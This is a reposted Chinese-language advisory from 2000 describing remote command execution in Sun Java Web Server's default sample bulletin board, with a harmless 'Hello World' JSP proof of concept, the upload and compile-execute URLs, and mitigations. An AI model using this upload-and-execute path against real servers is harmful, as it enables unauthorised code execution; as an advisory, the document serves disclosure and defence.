最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
Sun Java Web服务器远程可执行命令漏洞
时间:2008-01-12 编辑:简简单单 来源:一聚教程网
漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:
在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。
漏洞测试方法如下:
下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。
输入下面的JSP代码将打印出"Hello World":
<% String s="Hello World"; %>
<%=s %>
通过下面的公告版连接Post这段代码:
http://jws.site/examples/applications/bboard/bboard_frames.html
检验是否该代码真正的上载了:
http://jws.site/board.html
通过执行下面的连接编译和执行该代码:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html
解 决 方 法:
仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。
-
上一个: 在Linux上安装Tomcat
-
下一个: Apache+Servlet+jsp
相关文章
- python fabric实现远程部署的教程 01-05
- 怎么远程控制另一台计算机 11-08
- Maven远程部署到tomcat环境的步骤 08-24
- tplink远程访问硬盘录像机WEB界面的注意事项 08-09
- composer 将远程的包更改为本地开发模式 06-08
- ImageMagick重大0day漏洞-远程代码执行 05-12